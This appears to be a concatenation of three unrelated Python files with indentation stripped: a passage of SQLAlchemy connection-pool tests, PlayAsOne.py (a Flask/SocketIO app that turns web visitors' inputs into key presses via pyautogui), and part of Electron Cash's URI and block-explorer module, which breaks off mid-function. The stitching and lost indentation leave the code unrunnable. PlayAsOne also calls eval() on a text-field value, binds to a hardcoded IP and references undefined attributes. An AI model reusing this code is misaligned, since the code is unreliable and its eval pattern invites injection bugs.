c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
event.listen(p, "connect", canary.connect)
event.listen(p, "checkout", canary.checkout)
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.dbapi_connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
eq_(
canary.mock_calls,
[call.connect(ANY, ANY), call.checkout(ANY, ANY, ANY)],
)
@testing.requires.timing_intensive
def test_connect_checkout_handler_always_gets_info(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
@event.listens_for(p, "connect")
def connect(conn, conn_rec):
conn_rec.info["x"] = True
@event.listens_for(p, "checkout")
def checkout(conn, conn_rec, conn_f):
assert "x" in conn_rec.info
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.dbapi_connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
def test_error_on_pooled_reconnect_cleanup_wcheckout_event(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.close()
@event.listens_for(p, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if dbapi.is_shutdown:
raise tsa.exc.DisconnectionError()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.combinations((True,), (False,))
def test_userspace_disconnectionerror_weakref_finalizer(self, detach_gced):
dbapi, pool = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2, _is_asyncio=detach_gced
)
if detach_gced:
pool._dialect.is_async = True
@event.listens_for(pool, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if getattr(dbapi_con, "boom") == "yes":
raise tsa.exc.DisconnectionError()
conn = pool.connect()
old_dbapi_conn = conn.dbapi_connection
conn.close()
eq_(old_dbapi_conn.mock_calls, [call.rollback()])
old_dbapi_conn.boom = "yes"
conn = pool.connect()
dbapi_conn = conn.dbapi_connection
del conn
gc_collect()
if detach_gced:
# new connection was detached + abandoned on return
eq_(dbapi_conn.mock_calls, [])
else:
# new connection reset and returned to pool
eq_(dbapi_conn.mock_calls, [call.rollback()])
# old connection was just closed - did not get an
# erroneous reset on return
eq_(old_dbapi_conn.mock_calls, [call.rollback(), call.close()])
@testing.requires.timing_intensive
def test_recycle_pool_no_race(self):
def slow_close():
slow_closing_connection._slow_close()
time.sleep(0.5)
slow_closing_connection = Mock()
slow_closing_connection.connect.return_value.close = slow_close
class Error(Exception):
pass
dialect = Mock()
dialect.is_disconnect = lambda *arg, **kw: True
dialect.dbapi.Error = Error
pools = []
class TrackQueuePool(pool.QueuePool):
def __init__(self, *arg, **kw):
pools.append(self)
super(TrackQueuePool, self).__init__(*arg, **kw)
def creator():
return slow_closing_connection.connect()
p1 = TrackQueuePool(creator=creator, pool_size=20)
from sqlalchemy import create_engine
eng = create_engine(testing.db.url, pool=p1, _initialize=False)
eng.dialect = dialect
# 15 total connections
conns = [eng.connect() for i in range(15)]
# return 8 back to the pool
for conn in conns[3:10]:
conn.close()
def attempt(conn):
time.sleep(random.random())
try:
conn._handle_dbapi_exception(
Error(), "statement", {}, Mock(), Mock()
)
except tsa.exc.DBAPIError:
pass
# run an error + invalidate operation on the remaining 7 open
# connections
threads = []
for conn in conns:
t = threading.Thread(target=attempt, args=(conn,))
t.start()
threads.append(t)
for t in threads:
t.join()
# return all 15 connections to the pool
for conn in conns:
conn.close()
# re-open 15 total connections
conns = [eng.connect() for i in range(15)]
# 15 connections have been fully closed due to invalidate
assert slow_closing_connection._slow_close.call_count == 15
# 15 initial connections + 15 reconnections
assert slow_closing_connection.connect.call_count == 30
assert len(pools) <= 2, len(pools)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.dbapi_connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.dbapi_connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.dbapi_connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(
reset_on_return=None, pool_size=1, max_overflow=0
)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.dbapi_connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.dbapi_connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.dbapi_connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c2 = p.connect() # noqa
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.dbapi_connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.dbapi_connection
c1.invalidate()
assert c1.dbapi_connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.dbapi_connection is not c1_con
c2_con = c2.dbapi_connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_no_double_checkin(self):
p = self._queuepool_fixture(pool_size=1)
c1 = p.connect()
rec = c1._connection_record
c1.close()
assert_raises_message(
Warning, "Double checkin attempted on %s" % rec, rec.checkin
)
def test_lifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator, use_lifo=True)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
for i in range(5):
pc1 = p.connect()
is_(pc1.dbapi_connection, c3)
pc1.close()
pc1 = p.connect()
is_(pc1.dbapi_connection, c3)
pc2 = p.connect()
is_(pc2.dbapi_connection, c2)
pc2.close()
pc3 = p.connect()
is_(pc3.dbapi_connection, c2)
pc2 = p.connect()
is_(pc2.dbapi_connection, c1)
pc2.close()
pc3.close()
pc1.close()
def test_fifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
pc1 = p.connect()
is_(pc1.dbapi_connection, c1)
pc1.close()
pc1 = p.connect()
is_(pc1.dbapi_connection, c2)
pc2 = p.connect()
is_(pc2.dbapi_connection, c3)
pc2.close()
pc3 = p.connect()
is_(pc3.dbapi_connection, c1)
pc2 = p.connect()
is_(pc2.dbapi_connection, c3)
pc2.close()
pc3.close()
pc1.close()
class ResetOnReturnTest(PoolTestBase):
def _fixture(self, **kw):
dbapi = Mock()
return (
dbapi,
pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
)
def test_plain_rollback(self):
dbapi, p = self._fixture(reset_on_return="rollback")
c1 = p.connect()
c1.close()
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_plain_commit(self):
dbapi, p = self._fixture(reset_on_return="commit")
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_plain_none(self):
dbapi, p = self._fixture(reset_on_return=None)
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
# TODO: the SingletonThreadPool cleanup method
# has an unfixed race condition within the "cleanup" system that
# leads to this test being off by one connection under load; in any
# case, this connection will be closed once it is garbage collected.
# this pool is not a production-level pool and is only used for the
# SQLite "memory" connection, and is not very useful under actual
# multi-threaded conditions
# @testing.requires.threading_with_mock
# def test_cleanup_no_gc(self):
# self._test_cleanup(True)
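# Illustrative aside (not part of the test class, assumed sqlite3 creator): as the
# comment above notes, this pool exists essentially for SQLite ":memory:" databases,
# where each thread keeps reusing its own single connection, e.g.
#   import sqlite3
#   p = pool.SingletonThreadPool(creator=lambda: sqlite3.connect(":memory:"), pool_size=3)
#   c = p.connect()   # same underlying DBAPI connection for this thread
#   c.close()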
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.dbapi_connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(0.01)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
lp = len(p._all_conns)
is_true(3 <= lp <= 4)
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
def test_no_rollback_from_nested_connections(self):
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
c1 = p.connect()
mock_conn = c1.dbapi_connection
c2 = p.connect()
is_(c1, c2)
c2.close()
eq_(mock_conn.mock_calls, [])
c1.close()
eq_(mock_conn.mock_calls, [call.rollback()])
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
c1 = p.connect()
dbapi.connect.assert_has_calls(
[call("foo.db"), call("foo.db")], any_order=True
)
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect("foo.db")
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
def test_connect(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect("foo.db")
p = pool.StaticPool(creator)
c1 = p.connect()
conn = c1.dbapi_connection
c1.close()
c2 = p.connect()
is_(conn, c2.dbapi_connection)
class CreatorCompatibilityTest(PoolTestBase):
def test_creator_callable_outside_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator()
finally:
conn.close()
def test_creator_callable_outside_witharg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator(Mock())
finally:
conn.close()
def test_creator_patching_arg_to_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
# the creator is the two-arg form
conn = creator(Mock())
finally:
conn.close()
def mock_create():
return creator()
conn = e.connect()
conn.invalidate()
conn.close()
# test that the 'should_wrap_creator' status
# will dynamically switch if the _creator is monkeypatched.
# patch it with a zero-arg form
with patch.object(e.pool, "_creator", mock_create):
conn = e.connect()
conn.invalidate()
conn.close()
conn = e.connect()
conn.close()
|
PlayAsOne.py | #!/usr/bin/env python2
from flask import Flask, request, flash, url_for, redirect, render_template, abort, send_from_directory, jsonify
from flask_socketio import SocketIO, emit
from json import loads, dumps
import Tkinter as tk
import pyautogui
import threading
import ttk
import time
import sys
if sys.platform == 'win32':
import win32gui
if sys.platform == 'darwin':
pass
class PlayAsOne:
def __init__(self):
self.gui = GUI(self)
self.running = False
def start(self):
if not self.find_game_window():
self.gui.status_label.config(text='Could not locate the window!')
self.running = True
self.gui.start_button.config(text='Stop', command=self.stop)
self.gui.status_label.config(text='Running')
self.gui.titlebar_entry.config(state='disabled')
self.gui.mode_combobox.config(state='disabled')
self.gui.input_mode_combobox.config(state='disabled')
self.gui.interval_entry.config(state='disabled')
threading.Thread(target=socketio.run, args=(app,), kwargs={'host': '18.111.92.199', 'port':3000}).start()
threading.Thread(target=self.regulate_democracy).start()
def stop(self):
self.gui.start_button.config(text='Start', command=self.start)
self.gui.status_label.config(text='Not Running')
self.gui.titlebar_entry.config(state='normal')
self.gui.mode_combobox.config(state='normal')
self.gui.input_mode_combobox.config(state='normal')
self.gui.interval_entry.config(state='normal')
self.running = False
def regulate_democracy(self):
while self.running:
execute_democracy()
time.sleep(self.get_democracy_interval())
def is_running(self):
return self.running
def get_mode(self):
return self.gui.mode_combobox.get()
def get_input_mode(self):
return self.gui.input_mode_combobox.get()
def get_democracy_interval(self):
try:
return_code = int(self.gui.interval_entry.get())
return return_code
except ValueError:
return 0
def find_game_window(self):
if sys.platform == 'win32':
winlist = []
def enum_cb(hwnd, extra):
winlist.append((hwnd, win32gui.GetWindowText(hwnd)))
win32gui.EnumWindows(enum_cb, None)
window = [
(hwnd, title) for hwnd, title in winlist if self.gui.titlebar_entry.get().lower() in title.lower()]
if not window:
return False
window = window[0]
hwnd = window[0]
win32gui.ShowWindow(hwnd, 11)
win32gui.ShowWindow(hwnd, 1)
win32gui.SetForegroundWindow(hwnd)
region = win32gui.GetWindowRect(hwnd)
region = (
region[0],
region[1],
region[2]-region[0],
region[3]-region[1]
)
return region
return False
def send_key(self, key):
if not self.running:
return
self.find_game_window()
try:
wrapdict = eval(self.gui.wrap_entry.get())
if key.lower() in wrapdict:
key = wrapdict[key.lower()]
except (SyntaxError, NameError, TypeError, ValueError):
# An empty or malformed wrap-keys entry is simply ignored
pass
pyautogui.press(str(key))
def send_mouse_click(self, x, y, button):
if not self.running:
return
window_region = self.find_game_window()
if x < window_region[0]:
return
if y < window_region[1]:
return
if x > window_region[2]:
return
if y > window_region[3]:
return
pyautogui.click(x=x, y=y, button=button)
class GUI(tk.Tk):
def __init__(self, server):
tk.Tk.__init__(self)
self.server = server
self.mode_frame = tk.Frame(self)
self.mode_frame.grid(row=0, column=0, columnspan=2)
self.mode_label = tk.Label(self.mode_frame, text='Mode: ')
self.mode_label.grid(row=0, column=0, sticky='w')
self.mode_combobox = ttk.Combobox(
self.mode_frame, state='readonly', width=9, values=('Chaos', 'Democracy'))
self.mode_combobox.set('Chaos')
self.mode_combobox.grid(row=0, column=1, sticky='ew')
self.input_mode_label = tk.Label(self.mode_frame, text='Input Mode: ')
self.input_mode_label.grid(row=1, column=0, sticky='w')
self.input_mode_combobox = ttk.Combobox(
self.mode_frame, state='readonly', width=13, values=('NES', 'SNES', 'Full Keyboard'))
self.input_mode_combobox.set('Full Keyboard')
self.input_mode_combobox.grid(row=1, column=1, sticky='ew')
self.titlebar_label = tk.Label(self.mode_frame, text='Title Bar Name: ')
self.titlebar_label.grid(row=2, column=0, sticky='w')
self.titlebar_entry = ttk.Entry(self.mode_frame)
self.titlebar_entry.grid(row=2, column=1, sticky='ew')
self.interval_label = tk.Label(self.mode_frame, text='Democracy Interval: ')
self.interval_label.grid(row=3, column=0, sticky='w')
self.interval_entry = ttk.Entry(self.mode_frame)
self.interval_entry.grid(row=3, column=1, sticky='ew')
self.wrap_label = tk.Label(self.mode_frame, text='Wrap Keys: ')
self.wrap_label.grid(row=4, column=0, sticky='w')
self.wrap_entry = ttk.Entry(self.mode_frame)
self.wrap_entry.grid(row=4, column=1, sticky='ew')
self.status_label = tk.Label(self, text='Not Running')
self.status_label.grid(row=3, column=0, columnspan=2)
self.start_button = ttk.Button(self, text='Start', command=self.server.start)
self.start_button.grid(row=4, column=0, columnspan=2)
def start(self):
if self.deselected_screenshot is None:
pyautogui.alert(
text='You need to set a constant screenshot.', title='Screenshot', button='OK')
return
self.start_button.config(text='Stop', command=self.stop)
self.server.start()
def stop(self):
self.start_button.config(text='Start', command=self.start)
self.server.stop()
def take_screenshot(self):
def func():
self.screenshot_button.config(state='disabled')
for second in reversed(range(4)):
self.screenshot_label.config(
text='Deselect the game window %s' % second)
if second != 0:
time.sleep(1)
region = []
for second in reversed(range(4)):
self.screenshot_label.config(
text='Place the mouse at the top left\nof the game\'s title bar %s' % second)
if second != 0:
time.sleep(1)
constant_top_left = pyautogui.position()
region.extend(constant_top_left)
for second in reversed(range(4)):
self.screenshot_label.config(
text='Place the mouse at the bottom right\nof the game\'s title bar %s' % second)
if second != 0:
time.sleep(1)
constant_bottom_right = pyautogui.position()
region.extend(
(constant_bottom_right[0] - constant_top_left[0],
constant_bottom_right[1] - constant_top_left[1])
)
self.deselected_screenshot = pyautogui.screenshot(region=region)
pyautogui.click()
self.selected_screenshot = pyautogui.screenshot(region=region)
for second in reversed(range(4)):
self.screenshot_label.config(
text='Place mouse at the top left\nof the entire game window %s' % second)
if second != 0:
time.sleep(1)
top_left = pyautogui.position()
for second in reversed(range(4)):
self.screenshot_label.config(
text='Place mouse at the bottom right\nof the entire game window %s' % second)
if second != 0:
time.sleep(1)
bottom_right = pyautogui.position()
self.screen_size = [
constant_top_left[0] - top_left[0],
constant_top_left[1] - top_left[1],
bottom_right[0] - constant_bottom_right[0],
bottom_right[1] - constant_bottom_right[1]
]
self.screenshot_taken = True
self.screenshot_label.config(text='Screenshot Taken')
self.screenshot_button.config(
state='normal', text='Retake Screenshot')
threading.Thread(target=func).start()
app = Flask(__name__)
socketio = SocketIO(app, async_mode='eventlet')
gui_server = PlayAsOne()
user_count = 0
users = {}
democracy = []
@app.route("/")
def hello():
print("User entered")
return render_template('index.html')
@socketio.on('connect', namespace="/")
def test_connect():
print('test ran')
@socketio.on("add user", namespace="/")
def handle_add_user(username):
global user_count
global gui_server
user_count += 1
user = username
print user
users[user] = {'input_count': 0}
emit("initialize", {
'input_type': gui_server.get_input_mode(), 'mode': gui_server.get_mode()})
def handle_chaos(user_input):
gui_server.send_key(user_input)
def handle_democracy(user_input):
global democracy
for demo_input in democracy:
if demo_input[0] == user_input:
print(demo_input)
demo_input[1] += 1
return
# Only reached when no existing entry matched: register a new vote tally
democracy.append([user_input, 1])
def execute_democracy():
global democracy
most_votes = ["", 0]
for user_input in democracy:
if user_input[1] > most_votes[1]:
most_votes = user_input
gui_server.send_key(most_votes[0])
democracy = []
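# Illustrative only (made-up votes): if democracy == [["a", 3], ["b", 1]] when
# regulate_democracy fires, execute_democracy presses "a" via send_key and then
# clears the vote list for the next interval.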
@socketio.on('on disconnect', namespace="/")
def handle_disconnect(json):
global user_count
user_count -= 1
user = loads(json)
users.pop(user['username'])
@socketio.on("sendInput", namespace="/")
def handle_input(json):
user_input = json["user_input"]
print(user_input)
if user_input not in users:
users[user_input] = {'input_count': 0}
users[user_input]['input_count'] += 1
if (gui_server.get_mode() == 'Chaos'):
handle_chaos(user_input)
elif gui_server.get_mode() == 'Democracy':
handle_democracy(user_input)
gui_server.gui.mainloop()
|
web.py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import decimal # Qt 5.12 also exports Decimal, so take the package name
import os
import re
import shutil
import sys
import threading
import urllib
from .address import Address
from . import bitcoin
from . import networks
from .util import format_satoshis_plain, bh2u, bfh, print_error, do_in_main_thread
from . import cashacct
from .i18n import _
DEFAULT_EXPLORER = "Blockchair.com"
mainnet_block_explorers = {
'Bitcoin.com': ('https://explorer.bitcoin.com/bch',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block' : 'block'}),
'Blockchair.com': ('https://blockchair.com/bitcoin-cash',
Address.FMT_CASHADDR,
{'tx': 'transaction', 'addr': 'address', 'block' : 'block'}),
'BTC.com': ('https://bch.btc.com',
Address.FMT_CASHADDR,
{'tx': '', 'addr': '', 'block' : 'block'}),
'ViaBTC.com': ('https://explorer.viawallet.com/bch',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block' : 'block'}),
'BlockExplorer.one': ('https://blockexplorer.one/bch/mainnet',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block' : 'blockHash'}),
'electroncash.de': ('https://explorer.electroncash.de',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
'Blockchain.com': ('https://www.blockchain.com/bch',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block'}),
}
DEFAULT_EXPLORER_TESTNET = 'Bitcoin.com'
testnet_block_explorers = {
'Bitcoin.com' : ('https://explorer.bitcoin.com/tbch',
Address.FMT_LEGACY, # For some reason testnet expects legacy and fails on bchtest: addresses.
{'tx': 'tx', 'addr': 'address', 'block' : 'block'}),
'BlockExplorer.one': ('https://blockexplorer.one/bch/testnet',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block' : 'blockHash'}),
'electroncash.de': ('https://testnet-explorer.electroncash.de',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
'Blockchain.com': ('https://www.blockchain.com/bch-testnet',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block'}),
}
def BE_info():
if networks.net.TESTNET:
return testnet_block_explorers
return mainnet_block_explorers
def BE_tuple(config):
infodict = BE_info()
return (infodict.get(BE_from_config(config))
or infodict.get(BE_default_explorer()) # In case block explorer in config is bad/no longer valid
)
def BE_default_explorer():
return (DEFAULT_EXPLORER
if not networks.net.TESTNET
else DEFAULT_EXPLORER_TESTNET)
def BE_from_config(config):
return config.get('block_explorer', BE_default_explorer())
def BE_URL(config, kind, item):
be_tuple = BE_tuple(config)
if not be_tuple:
return
url_base, addr_fmt, parts = be_tuple
kind_str = parts.get(kind)
if kind_str is None:
return
if kind == 'addr':
assert isinstance(item, Address)
item = item.to_string(addr_fmt)
return "/".join(part for part in (url_base, kind_str, item) if part)
def BE_sorted_list():
return sorted(BE_info())
def _strip_cashacct_str(s: str) -> str:
'''Strips emojis and ';' characters from a cashacct string
of the form name#number[.123]'''
return cashacct.CashAcct.strip_emoji(s).replace(';', '').strip()
def create_URI(addr, amount, message, *, op_return=None, op_return_raw=None, net=None):
is_cashacct = bool(isinstance(addr, str) and cashacct.CashAcct.parse_string(addr))
if not isinstance(addr, Address) and not is_cashacct:
return ""
if op_return is not None and op_return_raw is not None:
raise ValueError('Must specify exactly one of op_return or op_return_raw as kwargs to create_URI')
if is_cashacct:
scheme, path = cashacct.URI_SCHEME, _strip_cashacct_str(addr)
else:
scheme, path = addr.to_URI_components(net=net)
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
if op_return:
query.append(f'op_return={str(op_return)}')
if op_return_raw:
query.append(f'op_return_raw={str(op_return_raw)}')
p = urllib.parse.ParseResult(scheme=scheme,
netloc='', path=path, params='',
query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
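# Illustrative sketch (values are made up): for an Address `addr` on mainnet,
# create_URI(addr, 100000, "donation") yields something like
#   "bitcoincash:<cashaddr>?amount=0.001&message=donation"
# since format_satoshis_plain renders the 100000-satoshi amount as 0.001 and the
# message is URL-quoted; passing op_return_raw adds an op_return_raw=<hex> parameter.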
def urlencode(s):
''' URL Encode; encodes a url or a uri fragment by %-quoting special chars'''
return urllib.parse.quote(s)
def urldecode(url):
''' Inverse of urlencode '''
return urllib.parse.unquote(url)
def parseable_schemes(net = None) -> tuple:
if net is None:
net = networks.net
return (net.CASHADDR_PREFIX, cashacct.URI_SCHEME)
class ExtraParametersInURIWarning(RuntimeWarning):
''' Raised by parse_URI to indicate the parsing succeeded but that
extra parameters were encountered when parsing.
args[0] is the function return value (dict of parsed args).
args[1:] are the URL parameters that were not understood (unknown params)'''
class DuplicateKeyInURIError(RuntimeError):
''' Raised on duplicate param keys in URI.
args[0] is a translated error message suitable for the UI
args[1:] is the list of duplicate keys. '''
class BadSchemeError(RuntimeError):
''' Raised if the scheme is bad/unknown for a URI. '''
class BadURIParameter(ValueError):
''' Raised if:
- 'amount' is not numeric,
- 'address' is invalid
- bad cashacct string,
- 'time' or 'exp' are not ints
args[0] is the bad argument name e.g. 'amount'
args[1] is the underlying Exception that was raised (if any, may be missing). '''
def parse_URI(uri, on_pr=None, *, net=None, strict=False, on_exc=None):
""" If strict=True, may raise ExtraParametersInURIWarning (see docstring
above).
on_pr - a callable that will run in the context of a daemon thread if this
is a payment request which requires further network processing. A single
argument is passed to the callable, the payment request after being verified
on the network. Note: as stated, this runs in the context of the daemon
thread, unlike on_exc below.
on_exc - (optional) a callable that will be executed in the *main thread*
only in the cases of payment requests and only if they fail to serialize or
deserialize. The callable must take 1 arg, a sys.exc_info() tuple. Note: as
stated, this runs in the context of the main thread always, unlike on_pr
above.
May raise DuplicateKeyInURIError if duplicate keys were found.
May raise BadSchemeError if unknown scheme.
May raise Exception subclass on other misc. failure.
Returns a dict of uri_param -> value on success """
if net is None:
net = networks.net
if ':' not in uri:
# Test it's valid
Address.from_string(uri, net=net)
return {'address': uri}
u = urllib.parse.urlparse(uri, allow_fragments=False) # allow_fragments=False allows for cashacct:name#number URIs
# The scheme always comes back in lower case
accept_schemes = parseable_schemes(net=net)
if u.scheme not in accept_schemes:
raise BadSchemeError(_("Not a {schemes} URI").format(schemes=str(accept_schemes)))
address = u.path
is_cashacct = u.scheme == cashacct.URI_SCHEME
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query, keep_blank_values=True)
else:
pq = urllib.parse.parse_qs(u.query, keep_blank_values=True)
for k, v in pq.items():
if len(v) != 1:
raise DuplicateKeyInURIError(_('Duplicate key in URI'), k)
out = {k: v[0] for k, v in pq.items()}
if address:
if is_cashacct:
if '%' in address:
# on macOS and perhaps other platforms the '#' character may
# get passed-in as a '%23' if opened from a link or from
# some other source. The below call is safe and won't raise.
address = urldecode(address)
if not cashacct.CashAcct.parse_string(address):
raise BadURIParameter('address', ValueError(_("{acct_name} is not a valid cashacct string").format(acct_name=address)))
address = _strip_cashacct_str(address)
else:
# validate
try: Address.from_string(address, net=net)
except Exception as e: raise BadURIParameter('address', e) from e
out['address'] = address
if 'amount' in out:
try:
am = out['amount']
m = re.match(r'([0-9.]+)X([0-9]{2})', am)
if m:
k = int(m.group(2)) - 8
amount = decimal.Decimal(m.group(1)) * int(pow(10, k))
else:
amount = decimal.Decimal(am) * int(bitcoin.COIN)
out['amount'] = int(amount)
except (ValueError, decimal.InvalidOperation, TypeError) as e:
raise BadURIParameter('amount', e) from e
if strict and 'memo' in out and 'message' in out:
# these two args are equivalent and cannot both appear together
raise DuplicateKeyInURIError(_('Duplicate key in URI'), 'memo', 'message')
elif 'message' in out:
out['memo'] = out['message']
elif 'memo' in out:
out['message'] = out['memo']
if 'time' in out:
try: out['time'] = int(out['time'])
except ValueError as e: raise BadURIParameter('time', e) from e
if 'exp' in out:
try: out['exp'] = int(out['exp'])
except ValueError as e: raise BadURIParameter('exp', e) from e
if 'sig' in out:
try: out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
except Exception as e: raise BadURIParameter('sig', e) from e
if 'op_return_raw' in out and 'op_return' in out:
if strict:
# these two args cannot both appear together
raise DuplicateKeyInURIError(_('Duplicate key in URI'), 'op_return', 'op_return_raw')
del out['op_return_raw'] # if not strict, just pick 1 and delete the other
if 'op_return_raw' in out:
# validate op_return_raw arg
try: bfh(out['op_return_raw'])
except Exception as e: raise BadURIParameter('op_return_raw', e) from e
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
is_pr = bool(r or (name and sig))
if is_pr and is_cashacct:
raise ValueError(_("'{uri_scheme}' payment requests are not currently supported").format(uri_scheme=cashacct.URI_SCHEME))
if on_pr and is_pr:
def get_payment_request_thread():
from . import paymentrequest as pr
try:
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
except:
''' May happen if the values in the request are such
that they cannot be serialized to a protobuf. '''
einfo = sys.exc_info()
print_error("Error processing payment request:", str(einfo[1]))
if on_exc:
do_in_main_thread(on_exc, einfo)
return
if on_pr:
# FIXME: See about also making this use do_in_main_thread.
